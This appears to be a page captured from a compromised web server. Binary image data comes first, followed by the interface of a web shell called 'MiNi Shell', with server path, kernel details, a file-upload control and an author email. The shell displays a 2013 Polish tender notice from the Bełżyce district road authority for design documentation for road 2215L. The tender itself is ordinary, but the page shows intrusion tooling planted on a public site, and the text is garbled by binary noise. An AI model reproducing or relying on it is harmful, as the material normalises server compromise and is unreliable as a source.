JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130926/197655-N-2013.html

<p class="kh_header"><b>Bełżyce: opracowaniu kompleksowej dokumentacji technicznej i dokumentacji przetargowej oraz studium wykonalności dla zadania inwestycyjnego pn. Rozbudowa dr.pow. Nr2215L Lublin (ul. Związkowa,ul. Choiny)- Jakubowice Konińskie - Majdan Krasieniński od km 2+500 do km 3+871 (1371mb), od km 4+496 do km 5+976 (1480mb), od km 6+221 do km 10+059 (3838mb) o łącznej długości 6 689 mb wraz z uzyskaniem w imieniu i na rzecz Zarządu Powiatu w Lublinie, jako zarządcy drogi powiatowej - decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) w oparciu o przygotowane przez Wykonawcę materiały</b><br>
<b>Numer ogłoszenia: 197655 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Lublinie z/s w Bełżycach , ul. Żeromskiego 3, 24-200 Bełżyce, woj. lubelskie, tel. 081 5162475, 5162885, faks 081 5162478.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ebip.lublin.pl/57</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> ---------------</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Powiatowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowaniu kompleksowej dokumentacji technicznej i dokumentacji przetargowej oraz studium wykonalności dla zadania inwestycyjnego pn. Rozbudowa dr.pow. Nr2215L Lublin (ul. Związkowa,ul. Choiny)- Jakubowice Konińskie - Majdan Krasieniński od km 2+500 do km 3+871 (1371mb), od km 4+496 do km 5+976 (1480mb), od km 6+221 do km 10+059 (3838mb) o łącznej długości 6 689 mb wraz z uzyskaniem w imieniu i na rzecz Zarządu Powiatu w Lublinie, jako zarządcy drogi powiatowej - decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) w oparciu o przygotowane przez Wykonawcę materiały.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres opracowań obejmuje:
a) uzyskanie map do celów projektowych w wersji analogowej - pozyskanie map leży po stronie Wykonawcy, b) projekt budowlany - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej, c) projekt wykonawczy - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej, d) przedmiar robót - 2 egz. w wersji papierowej i 1 egz. w edytowalnej wersji elektronicznej, e) kosztorys inwestorski - 2 egz. w wersji papierowej i 1 egz. w edytowalnej wersji elektronicznej, f) kosztorys ofertowy - 2 egz. w wersji papierowej i 1 egz. w edytowalnej wersji elektronicznej. UWAGA! Wymagane jest sporządzenie przedmiaru robót, kosztorysu ofertowego i kosztorysu inwestorskiego, odrębnie dla części inwestycji położonej na terenie Gminy Niemce oraz części położonej na terenie Gminy Jastków,  wraz z określeniem długości odcinków na terenie danej gminy. g) szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych (SSTWiORB) - 2 egz. w wersji papierowej i 1 egz. w wersji elektronicznej, h) specyfikacja istotnych warunków zamówienia w zakresie opisu przedmiotu zamówienia dla robót budowlanych realizowanych w oparciu o opracowaną dokumentację projektową - 1 egz. w wersji papierowej i 1 egz. w edytowalnej wersji elektronicznej,
i) projekt stałej zatwierdzonej organizacji ruchu - 2 egz. w wersji papierowej dla całego ciągu drogowego drogi powiatowej Nr 2215L tj. od km 2+500 do km 10+059 - (pozyskanie map leży po stronie Wykonawcy) i 1 egz. w wersji elektronicznej,
j) projekt czasowej zatwierdzonej organizacji ruchu na czas prowadzonych robót - 2 egz. w wersji papierowej (pozyskanie map leży po stronie Wykonawcy) i 1 egz. w wersji elektronicznej,
k) materiały niezbędne do uzyskania decyzji o środowiskowych uwarunkowaniach, w tym kartę informacyjną przedsięwzięcia, przygotowaną zgodnie z art. 3 ust. 1 pkt 5 ustawy o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko - Dz. U. Nr 199/2008r. poz. 1227, z późn. zm.,
l) raport oddziaływania przedsięwzięcia na środowisko (w przypadku nałożenia przez właściwy organ obowiązku jego sporządzenia),
m) uzyskanie prawomocnej decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia, w tym w szczególności, występowanie do właściwych organów o wydanie opinii, uzgodnień i postanowień, sporządzenie dokumentów wynikających z uzyskanych opinii, uzgodnień i postanowień,
n) uzyskanie pozostałych warunków technicznych przyłączenia niezbędnych mediów (Zamawiający jest w posiadaniu większości warunków technicznych), odprowadzenia wód deszczowych itp.,
o) opracowanie projektów budowlanych poszczególnych branż - o szczegółowości zgodnej z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego,
p) studium wykonalności projektu,
q) badania geotechniczne podłoża gruntowego zgodnie z załącznikiem nr 4 do Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 1999r.  Nr 43 poz. 430),
r) wykonanie wszelkich niezbędnych opracowań, których konieczność wyniknie w toku prac projektowych,
s) uzyskanie pozwolenia wodno-prawnego (jeśli dotyczy),
t) przygotowanie wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej zgodnie z art. 11d ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (j.t. Dz. U. z 2008r Nr 193 poz. 1194 z późniejszymi zmianami) wraz ze wszystkimi niezbędnymi załącznikami w tym m.in.: mapy zawierające projekty podziału nieruchomości (orientacyjna ilość działek do podziału: strona prawa: ok. 192 szt., strona lewa: ok. 181 szt. = około 373 szt.),
u) uzyskanie w imieniu i na rzecz Zarządu Powiatu w Lublinie, jako zarządcy drogi powiatowej - (na podst. pełnomocnictwa udzielonego przez Zamawiającego), decyzji o zezwoleniu na realizację inwestycji drogowej w oparciu o przygotowane przez Wykonawcę materiały,
v) sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego - uwzględnianej w planie bezpieczeństwa i ochrony zdrowia ze wskazaniem w szczególności, czy zakres robót obejmuje jeden z rodzajów wymienionych w art. 21a ust.2 ustawy Prawo Budowlane; informacja winna uwzględniać warunki rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003 roku w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia,
w) sprawować nadzór autorski w trakcie wykonywania robót budowlanych realizowanych w oparciu o sporządzoną dokumentację,
x) wykonać jednokrotną aktualizację kosztorysu inwestorskiego w ciągu trzech lat od odbioru wykonanych opracowań (w terminie wyznaczonym przez Zamawiającego)
Cel opracowania:
- opracowanie kompleksowej dokumentacji projektowej w studium projektów budowlanych i wykonawczych, umożliwiającej uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej w trybie Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych;
- przygotowanie materiałów niezbędnych do przeprowadzenia postępowania przetargowego na wykonanie robót budowlanych, które są wymagane Ustawą Prawo Zamówień Publicznych wraz z aktami wykonawczymi  oraz materiałów niezbędnych do prawidłowej realizacji robot budowlanych.
Wymagania dla przedmiotowej drogi powiatowej:
- określenie klasy drogi i wyznaczenie kategorii ruchu na podstawie wykonanego przez Wykonawcę pomiaru ruchu i prognozy ruchu - do akceptacji przez Zamawiającego;
- opracowanie PBW dla odcinka drogi od km 2+500 do km 3+871  (1 371mb),  od km 4+496 do km 5+976 (1 480mb) i od km 6+221 do km 10+059 (3 838mb) o łącznej długości 6 689 mb, w tym na terenie Gminy Niemce odcinek długości 5,416 km oraz na terenie Gminy Jastków odcinek długości 1,273 km.
2. Na etapie projektu należy uwzględnić dowiązanie nawierzchni sytuacyjnie i wysokościowo dla połączenia przyszłej drogi ekspresowej S-17 (zadanie odcinek węzeł tzw.Dąbrowica - węzeł tzw. Lubartów i odcinek drogi krajowej nr 19 klasy GP: węzeł Lubartów - granica administracyjna miasta Lublina) z drogą powiatową 2215L od km 3+871 do km 4+496 (wiadukt na długości 625 mb). Zadanie jest wykonywane przez GDDKiA Oddział Lublin. Koniec realizacji zadania grudzień 2013 rok - informacja od GDDKiA.
3. Zakres rzeczowy:
1) przebudowa zatok autobusowych - 10 szt,
2) remont mostu drogowego w km 6+104,
3) przebudowa skrzyżowań z drogami innych kategorii - 23 szt.,
4) budowa chodnika jednostronnego na całej długości drogi o szerokości 2 m dopuszcza się fragmentaryczne zastosowanie chodnika obustronnie,
5) do przebudowy albo rozbiórki istniejący chodnik:
- szer. 1,0 m - strona lewa 480 mb,
- szer. 1,5 m - strona lewa 956 mb,
- szer. 1,5 m - strona prawa 235 mb
6) wykonanie utwardzonych poboczy szer. 1,25 m,
7) poszerzenie istniejącej jezdni do szer. 6 m,
8) przepusty pod jezdnią do przebudowy w związku z poszerzeniem jezdni,
9) wzmocnienie istniejącej nawierzchni,
10) wykonanie oznakowania poziomego i pionowego na całej drodze,
11) do każdej działki należy zaprojektować zjazdy (zjazdy do posesji z kostki brukowej natomiast zjazdy do pól warstwa ścieralna z mieszanki mineralno-asfaltowej).
4. Przy opracowaniu projektu należy uwzględnić:
- budowę przepustów (zgodnie z analizą zlewni wykonaną przez Wykonawcę),
- odwodnienie drogi (według propozycji i opracowania Wykonawcy),
- przebudowę istniejących urządzeń obcych jeżeli będą one kolidowały z budowanym odcinkiem drogi powiatowej,
- zawężenie w miarę możliwości szerokości pasa drogowego w celu zminimalizowania wykupu gruntów.
Kod CPV: 71322000-1 Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej;
71354000-4	Usługi sporządzania map;
71320000-7	Usługi inżynieryjne w zakresie projektowania
5. Zamawiający dopuszcza wykonanie przedmioty zamówienia przy udziale podwykonawców. Zamawiający wymaga wskazania przez Wykonawcę w ofercie (w Formularzu oferty) zakresu zamówienia (prac projektowych), których wykonanie Wykonawca powierzy Podwykonawcom (jeśli dotyczy). 
6. Zamawiający wymaga udzielenia przez Wykonawcę gwarancji na przedmiot zamówienia na okres minimum 24 miesięcy. Bieg okresu gwarancji rozpoczyna się w dniu następnym licząc od daty odbioru ostatecznego opracowania.
7. Studium wykonalności projektu Wykonawca zobowiązany jest przygotować zgodnie z obowiązującymi w dacie wykonania studium zasadami określonymi przez Instytucję Zarządzającą RPO WL 2007-2013 (wytycznymi Urzędu Marszałkowskiego Województwa Lubelskiego w Lublinie zawartymi m.in. w dokumentach pn. Wytyczne  ogólne dla studiów wykonalności dla projektów w ramach RPO województwa lubelskiego oraz Wytyczne tematyczne do studiów wykonalności  dla projektów w ramach RPO województwa lubelskiego w zakresie infrastruktury drogowej, dostępnymi na stronie internetowej www.rpo.lubelskie.pl. 
8. Zgodnie z art. 30 ust. 4 ustawy Pzp Zmawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Pzp).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.35.40.00-4, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp. Zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, poprzez wykazanie co najmniej 1 usługi  (Zał. Nr 3) polegającej na zaprojektowaniu odcinka drogi długości co najmniej 2,0 km dla budowy lub przebudowy wraz z uzyskaniem decyzji ZRID, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, załączając dowody określające czy usługa ta została wykonana w sposób należyty wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie. Ocena spełniania tego warunku nastąpi w systemie spełnia nie spełnia na podstawie załączonych dowodów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp. Zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp. Zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp. Zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać się doświadczeniem w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, poprzez wykazanie co najmniej 1 usługi (Zał. Nr 3) polegającej na zaprojektowaniu odcinka drogi długości co najmniej 2,0 km dla budowy lub przebudowy wraz z uzyskaniem decyzji ZRID, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, załączając dowody określające czy usługa ta została wykonana w sposób należyty wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie. Ocena spełniania tego warunku nastąpi w systemie spełnia nie spełnia na podstawie załączonych dowodów.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b w/w ustawy, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy na poniższych warunkach:
a) w przypadku ponadprzeciętnego czasu trwania procedur administracyjnych, mającego wpływ na termin wykonania, co nie wynika z winy Wykonawcy,
b) w przypadku zmiany stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego,
c) w przypadku szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych, niezbędnych do należytego wykonania umowy,
d) w przypadku wystąpienia siły wyższej (tj. działania i zamieszki wojenne, ataki terrorystyczne klęski żywiołowe spowodowane przez burze, huragany, ekonomiczne następstwa globalnego kryzysu finansowego i inne) uniemożliwiającej wykonanie zamówienia w terminie umownym,
e) w przypadku zmiany przepisów prawa mających wpływ na wykonanie przedmiotu Umowy lub jego poszczególnych etapów,
f) w przypadku złożenia przez Wykonawcę propozycji, które przyśpieszą ukończenie przedmiotu umowy, zmniejszając koszty lub w inny sposób dostarczą zamawiającemu pożytku,
g) w przypadku zmiany przewidzianych w SIWZ ilości działek do podziału geodezyjnego, zmiana ta będzie polegała na zwiększeniu lub zmniejszeniu tych ilości, co może spowodować zmianę terminu  realizacji lub zmianę wysokości wynagrodzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/57<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba ZDP, 24-200 Bełżyce. Na wniosek wykonawcy zamawiający przekaże SIWZ (koszt druku i przekazania ponosi Wykonawca, wpłata na konto: 56 1240 2438 1111 0010 0683 4893).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2013 godzina 10:15, miejsce: Siedziba ZDP, 24-200 Bełżyce, ul. Żeromskiego 3 - pokój nr 9 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com